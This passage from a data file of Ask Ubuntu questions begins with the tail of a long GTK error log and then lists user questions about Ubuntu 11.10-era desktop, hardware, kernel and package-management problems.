`gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_image_menu_item_set_always_show_image : ass ertion `gtk_is_image_menu_item ( image_menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_image_menu_item_set_always_show_image : ass ertion `gtk_is_image_menu_item ( image_menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_image_menu_item_set_always_show_image : ass ertion `gtk_is_image_menu_item ( image_menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_image_menu_item_set_always_show_image : ass ertion `gtk_is_image_menu_item ( image_menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_image_menu_item_set_always_show_image : ass ertion `gtk_is_image_menu_item ( image_menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_image_menu_item_set_always_show_image : ass ertion `gtk_is_image_menu_item ( image_menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_image_menu_item_set_always_show_image : ass ertion `gtk_is_image_menu_item ( image_menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_image_menu_item_set_always_show_image : ass ertion `gtk_is_image_menu_item ( image_menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_image_menu_item_set_always_show_image : ass ertion `gtk_is_image_menu_item ( image_menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_image_menu_item_set_always_show_image : ass ertion `gtk_is_image_menu_item ( image_menu_item ) ' failed ** ( gnome-panel:2970 ) : warning ** : failed to get pixmap 31457708 , 751 , 0 ** ( gnome-panel:2970 ) : warning ** : failed to get pixmap 31457708 , 928 , 0 ( nautilus:2985 ) : gtk-critical ** : gtk_image_menu_item_set_always_show_image : ass ertion `gtk_is_image_menu_item ( image_menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_menu_item_get_submenu : assertion `gtk_is_m enu_item ( menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_menu_item_get_submenu : assertion `gtk_is_m enu_item ( menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_widget_get_parent : assertion `gtk_is_widge t ( widget ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_menu_item_get_submenu : assertion `gtk_is_m enu_item ( menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_menu_item_get_submenu : assertion `gtk_is_m enu_item ( menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_menu_item_get_submenu : assertion `gtk_is_m enu_item ( menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_menu_item_get_submenu : assertion `gtk_is_m enu_item ( menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_widget_get_parent : assertion `gtk_is_widge t ( widget ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ** ( gnome-panel:2970 ) : warning ** : failed to get pixmap 31457956 , 751 , 0 ** ( gnome-panel:2970 ) : warning ** : failed to get pixmap 31457956 , 928 , 0 ** ( gnome-panel:2970 ) : warning ** : failed to get pixmap 31458022 , 751 , 0 ** ( gnome-panel:2970 ) : warning ** : failed to get pixmap 31458022 , 928 , 0 ( nautilus:2985 ) : gtk-critical ** : gtk_image_menu_item_set_always_show_image : ass ertion `gtk_is_image_menu_item ( image_menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_menu_item_get_submenu : assertion `gtk_is_m enu_item ( menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_menu_item_get_submenu : assertion `gtk_is_m enu_item ( menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_widget_get_parent : assertion `gtk_is_widge t ( widget ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_menu_item_get_submenu : assertion `gtk_is_m enu_item ( menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_menu_item_get_submenu : assertion `gtk_is_m enu_item ( menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_menu_item_get_submenu : assertion `gtk_is_m enu_item ( menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_menu_item_get_submenu : assertion `gtk_is_m enu_item ( menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_widget_get_parent : assertion `gtk_is_widge t ( widget ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_image_menu_item_set_always_show_image : ass ertion `gtk_is_image_menu_item ( image_menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_menu_item_get_submenu : assertion `gtk_is_m enu_item ( menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_menu_item_get_submenu : assertion `gtk_is_m enu_item ( menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_widget_get_parent : assertion `gtk_is_widge t ( widget ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_menu_item_get_submenu : assertion `gtk_is_m enu_item ( menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_menu_item_get_submenu : assertion `gtk_is_m enu_item ( menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_menu_item_get_submenu : assertion `gtk_is_m enu_item ( menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_menu_item_get_submenu : assertion `gtk_is_m enu_item ( menu_item ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_widget_get_parent : assertion `gtk_is_widge t ( widget ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ( nautilus:2985 ) : gtk-critical ** : gtk_container_foreach : assertion `gtk_is_conta iner ( container ) ' failed ( nautilus:2985 ) : gtk-critical ** : find_menu_position : assertion `gtk_is_menu_she ll ( menushell ) ' failed ** ( process:3159 ) : debug : telepathy indicator started ** ( gnome-screensaver:3160 ) : warning ** : screensaver already running in this ses sion
87598	how can i set an html page as the desktop background ?	before people flag this as an exact duplicate of how can i use a .html file as desktop background/wallpaper ? please let me clarify . unlike that question where he just wants desktop icons for launching webapps , i want to use a html page as a background because i have a slideshow as a html file which retrieves images from many sources . i want to be able to set this as a background just like in windows xp . is this possible ? i heard from someone that i can use screenlets , but i would like to avoid that if possible . edit if not possible with compiz or nautilus , what about with other display managers ? gnome shell , xfce , ldxe etc ?
87600	printer jobs can not be stopped	recently i had one of the most frustrating experiences with my printer . i sent a some print jobs to my canon pixus ip3100 printer , but then realized there was a problem with the layout , and so i wanted to kill the print jobs . i went to this interface : however , pressing the stop button , marked with the square , did nothing . i tried everything i could think of to kill the print jobs . i tried restarting the printer . i rebooted the computer . i hit `` reset '' on the printer . i tried killing any printer related tasks in the task manager . no matter what i did , though , the same jobs were in the queue , and the only way in the end that i was able to get past them was to have them all run through to the end . is this a bug , or is there some other aspect to this that i am missing ?
87608	ubuntu 10.10 trash cpu overload	i have a weird bug with ubuntu 10.10 on one of my computer . when i empty the trash , the process - gvfsd-trash goes to 200 % and does not stop until i kill it ( using kill -9 ) . does not matter if i have a 1 file or 100 . what can be the issue ? here 's a screenshot of mine ( it 's not 200 % but it 's 98 % ) which i think it 's not normal .
87610	does intel turbo boost work in ubuntu ?	i have an intel i7 processor . it 's frequency is 2.67 ghz , however it has turbo boost allowed to a frequency of 3.3 ghz . is turbo boost posible using ubuntu ?
87620	alternatives to default copy/move manager	i am using ubuntu 11.10 and i want to know if there is any other copy/move manager rather than default . some features which i would in the copy manager are : auto start as my session start copy and resume options small and lightweight must be a gui having some features for copy management such as duplicate finder , transfer speed control , priority
87623	how to grant file permission to /dev directory permanently	i have a file /dev/ttys0 . and every time i boot , its file permission is changed to default ( unwritable ) by the system . so , i have to run chmod command every time i boot-up . how to change it 's file permission permanently .
87628	specifying variables in checkinstall	the compile command that i should use is : make klib=/lib/modules/ $ ( uname -r ) but as make utility is not good at uninstalling packages i want to use checkinstall like so : checkinstall install=no but how can i use klib variable with checkintstall ?
87629	how to drag and move icons in the gnome-shell favourites bar ?	i 'm using gnome-shell in ubuntu 11.10 , and i love the layout but when i add an application to the favourites panel on the left side , it shoves it at the bottom and i like to arrange them around on the bar . i tried left clicking , holding down , right clicking , after about a minute i found out , that i had to hold down the scroll wheel to move them , but it 's so damn tricky , sometimes it works and sometimes it just does nothing , is it actually the scroll wheel i need to be holding down ? or is there another mouse button i need too ? i 've only successfully managed to move an icon twice , other times i sat down holding down the scroll wheel forever just trying to move an icon , why does it have to be like this ? please help !
87632	is there a theme for ubuntu 11.10 which look like windows-7	first of all it is n not a dup of is there an ubuntu theme available to make it look like windows 7 ? because is is not working with 11.10 i also tried http : //www.howtogeek.com/55985/how-to-make-ubuntu-linux-look-like-windows-7/ but it is also for the 11.04 can anyone help ? ?
87637	uninstalling specific kernels	i have many kernels in the boot menu . i want some of them , but rest should be removed/uninstalled . how can i select and keep the kernels i want and remove rest of them ? i should be able to remove the kernel headers as well
87640	how do i reset the ubuntu icon theme ?	it appears my icon theme is busted . i 've been using it like this since april ( 11.04 ) upgrade , although i ca n't remember exactly how i got into this predicament . how can i reset the ubuntu icon theme ? which packages do i need to fix ? thanks !
87641	could not start vanilla kernel on virtual machine	i have a dell laptop with ubuntu 11.10 installed . it is the host for 3 virtual machines ( also running ubuntu 11.10 ) installed using kvm . i need to recompile the kernel of each virtual machine for setting some networks options , but when trying to boot on the new kernel i get the following : gave up waiting for root device '' ... . `` alert ! /dev/disk/by-uuid/ ( id ) does not exist '' . what i have tried : rootdelay 50 , 60 , ... did n't work booting with pci=nomsi ( and other options ) ... did n't work deleting the partition and starting from scratch ... got the same error . additional info : the kernel on my pc and vms is 3.0.0.12-generic-pae the kernel i am trying to compile is 3.0.1 there is no /etc/fstab when trying to boot from the new kernel the uuid that the new kernel is not finding is exactly the one i see on the /etc/fstab of the original kernel can anybody help me ?
87642	no touchpad settings	i 'd like to disable my touchpad while typing , per instructions on https : //help.ubuntu.com/11.10/ubuntu-help/mouse-disabletouchpad.html sadly , my 11.10 installation does not have any other tab than 'mouse ' in 'system settings ' - > 'mouse and touchpad' from what i can tell , the touchpad is detected ( and functioning ) properly : guus @ laptop-guus : ~ $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ imps/2 alps glidepoint id=13 [ slave pointer ( 2 ) ] ⎜ ↳ dell dell usb mouse id=15 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ power button id=9 [ slave keyboard ( 3 ) ] ↳ sleep button id=10 [ slave keyboard ( 3 ) ] ↳ laptop_integrated_webcam_fhd id=11 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] ↳ dell wmi hotkeys id=14 [ slave keyboard ( 3 ) ] can anyone suggest how to enable the 'disable while typing ' feature ?
87646	how do i run apps with options as icons from the dash ?	i want to run some applications with command line options ( for example , someapp -- option=3 ) , and i want to do this by opening the dash , typing the application name and clicking on the appropriate icon . i assume that i could do this from the launcher ( run the application , tick `` keep in launcher '' and then tweak the .desktop file ) , but i do n't want to have to add icons to the launcher . so , how do i add an icon for someapp -- option=3 to the dash / app lens ? i do n't mind somehow adding an extra icon for someapp -- option=3 , and seeing both icons when i type someapp into the dash . however , it would be ideal if i could choose to remove/replace the someapp icon - in most cases i only ever want to run the app with the option applied . it would be even more ideal if additionally i could add multiple icons , one for someapp -- option=3 and another for someapp -- option=4 - in a few cases i want to choose between different mode .
87647	why ca n't flowcharts or mathematical equations created in microsoft office and saved in .docx format be opened by libreoffice ?	i am using ubuntu 11.10 and libreoffice that comes with it . before this , i was a windows user and some of my previous documents were saved in .docx format . i tried to use libreoffice to open those .docx file and i can view all text , however i ca n't view the flowchart i drew and also mathematical equations . another issue is , if i create new flowchart with libreoffice and save it in .docx file , when i re-open that file , i ca n't view those flowcharts , but those flowcharts are there , occupied space . no problem for .odt format of course . does anyone know why this happens ? thanks in advanced .
87648	can i use a microsoft virtual wireless mouse with ubuntu ?	i bought a new laptop and hp gave me a free wifi mobile mouse , which not only is wireless , but also does n't need a usb receiver to work . the mouse , as stated in the user manual , can only be used in windows 7 , because it uses a technique called microsoft virtual wireless . is there any chance i can use it in linux , or more specifically , ubuntu 11.10 ?
87649	do not display user name in the panel	in unity the user name is shown in the panel . is is possible to make it so that it is not displayed ? for example it would be nice if only the icon but not the user name were displayed .
87655	why does the unity dash lose focus ?	the majority of the time , after logging in to ubuntu 11.10 ( 64-bit ) , the unity launcher seems to default to the wrong focus level . instead of , for example , the dash always being on top of other already-opened windows and applications , it sits behind them , forcing me to move the other windows to the side so that i can see the dash . why does n't the dash stay on top ?
87657	gnome shell in virtualbox host broken after a kernel upgrade	after a recent update , which included updates for the kernel , i am no longer able to log into gnome shell . to clarify the situation , at first it would boot into the gnome fallback session . to remedy this , i tried installing the guest additions again ( this has been a problem in the past ) . however , when i subsequently log in all i am presented with is the desktop . there is no top bar and the windows are undecorated . the only way out it to either trigger an acpi shutdown or insert a ctrl+alt+del from the virtualbox machine menu , which will allow me to restart or log out respectively . it is possible to log into unity 3d without any problem , therefore this probably rules out a 3d acceleration issue as well as the guest additions not being installed . any help would be appreciated !
87658	can shotwell create a folder structure based on the event a photo is assigned to ?	i have found here on au and elsewhere that shotwell can import files and organise them into folders/subfolders by date ( yyyymm , yyyy/mm/dd , and so on ) . can i import files , assign them to events , and have them organised into folders by event ? something like pictures/event a , pictures/event b , or ( even better ) pictures/201111/event a , pictures/201111/event b , pictures/201112/event c .
87660	no picture with a microsoft vx-1000 webcam in skype	i have a problem with my webcam in skype on ubuntu 11.10 . there is no picture . yesterday i installed the x64 version and there was a picture , but with strong artifacts . today i installed the 32-bit version and now there is no picture at all ! i tried to configure my webcam in the video4linux control panel , but when i click preview there is an error : `` failed to start preview process '' . can anybody help me with this ? i 'm in despair . the webcam is a microsoft vx-1000 .
87661	how to completely remove a package and all related files/directories ?	i 'm trying to remove samba , i 've tried using apt-get -- purge samba which according to the man page is supposed to delete .conf files . however smb.conf is still there . any tips on how to remove all related files/directories ?
87665	how do i change the hostname without a restart ?	i want to change the os hostname but i do not want to restart . i have edited /etc/hostname but it requires a restart to get implemented . how to avoid this ?
87667	getting mtp enabled devices to work with ubuntu ?	since ubuntu 13.04 storage access to external devices via mtp is supposed to work out of the box via a gvfs-mtp module . while this question is about the galaxy nexus , other android devices as well as windows phones and mtp enabled media players are also supported . for troubleshooting see this anwser . i am having quite a bit of problems getting file-transfers working over mtp with the galaxy nexus . i am using kubuntu 11.10 64-bit , and this is what i have done and the results i get : added rule for device in /etc/udev/rules.d/51-android.rules . the rule is the following and works for adb : subsystems== '' usb '' , attrs { idvendor } == '' 04e8 '' , attrs { idproduct } == '' 6860 '' , mode= '' 0666 '' , owner= '' leob '' # galaxy nexus restarted udev ( and computer just to make sure ) . adb works , and all methods for reading from the device via mtp seems to work ( i have tried mounting with mtpfs , gmtp and using the mtp-tools package directly ) . when i try to write to the device however , nothing i have tried works . as an example , running mtp-newfolder test_dir 0 0 gives the following output : libmtp version : 1.1.0 device 0 ( vid=04e8 and pid=6860 ) is a samsung gt-p7510/galaxy tab 10.1 . folder creation failed . error : could not close session ! if i run mtp-folders after a failed mtp-newfolder without re-plugging the device , i get the following output : attempting to connect device ( s ) device 0 ( vid=04e8 and pid=6860 ) is a samsung gt-p7510/galaxy tab 10.1 . ptp_error_io : failed to open session , trying again after resetting usb interface libmtp libusb : attempt to reset device mtp-folders : successfully connected friendly name : ( null ) error 1 : get storage information failed . error 2 : ptp layer error 02fe : get_all_metadata_fast ( ) : could not get proplist of all objects . error 2 : ( look this up in ptp.h for an explanation . ) error 2 : ptp layer error 02fe : get_handles_recursively ( ) : could not get object handles . error 2 : ( look this up in ptp.h for an explanation . ) libmtp_get_storage ( ) : resource temporarily unavailable ok . accompanied by the following in dmesg : [ 1000.912082 ] usb 2-4 : reset high speed usb device number 7 using ehci_hcd [ 1001.045877 ] usb 2-4 : usbfs : process 3166 ( mtp-folders ) did not claim interface 0 before use does anyone have any idea about what to do ? edit : i also tried the ptp mode . again , reading works fine , but i can not write anything to the device .
87670	will ubuntu become rolling distro ?	about a year ago i 've read that ubuntu is considering to become a rolling distro . since then i could n't found any fresher news about the topic . anyone has official information about the transition ?
87671	how do i start jobs as a non privileged user in upstart ?	i 'm using last upstart version for ubuntu 10.4 lts . upstart is launched with -- debug kernel flag . i 'm making a custom job configuration for nzbget daemon . basically , this job has a pre-start script that mounts a filesystem , a post-start script that unmounts the filesystem and an exec nzbget -d line . the problem is that the nzbget daemon needs to run as a non privilleged user . this feature is already included in nzbget . indeed , when i run from console sudo nzbget -d the process runs as a non privileged user . but when i start the upstart job with the exec nzbget -d line , the process nzbget -d runs as root . as said in the upstart cookbook , i tried to use su -c `` nzbget -d '' user and also start-stop-daemon both without the expect stanza as adviced . but for both commands , as upstart tracks the wrong pid i guess , it sees the main process as killed ( owing to upstart logs ) at the end of start process and thus , it launches the post-process script which i do n't want . = > how can i do it right ? how is it that exec nzbget -d upstart command makes the process run as root whereas sudo nzbget -d command makes it run as non privilleged user ?
87677	create link to folder thats useable with ftp	i created some links to folders in my home dir so i do n't have to go down the long path all the time , i used 'ln -s ' for this . i can use them when i log in via ssh but when use ftp it just shows the link as a file and not like a shortcut as intended . i tried to use just 'ln ' but that does n't seem to work with folders , and using the -d is not permitted . is there a way to this so i can also it in an ftp program ?
87686	periodic tick / click /crack sound from logitech quickcam pro 5000 usb webcam	while watching the input volume meter from my webcam in pavucontrol , it maxes out with a short ( 100ms or so ) cracking sound every ~3 seconds , independently of the ambient sound . how can i get rid of it ? looks like this has already been reported , but the project was abandoned . i do n't suppose it would help to bribe with a bounty ? : ) $ lsusb | grep -i cam bus 002 device 004 : id 046d:08ce logitech , inc. quickcam pro 5000 from the linux uvc driver footnotes : 1 first and second generation logitech webcams suffer from firmware bug which make the camera somehow unstable . as the issue is timing-related , the exact impact of the bug on a particular user can't be predicted . if you plan to buy a logitech webcam , consider getting one of the models not affected by the bug . more information about the issue , including possible workarounds , are available on the quickcam team website . 2 starting at version 2.6.22 , the linux kernel includes a usb audio bug fix which triggers a ( possibly identical to the above ) bug in first and second generation logitech webcams . see the linux uvc wiki for a workaround . both references are down , so i guess that 's it for this camera .
87696	create movies from images and sound files scripting transitions using the console ?	i need a program without gui that accepts some kind of scripting language capable of transitions ( fade , scale ... ) and generates movie files like avi , mkv ... from images like jpg , png and audio like mp3 ... thanks ! ! !
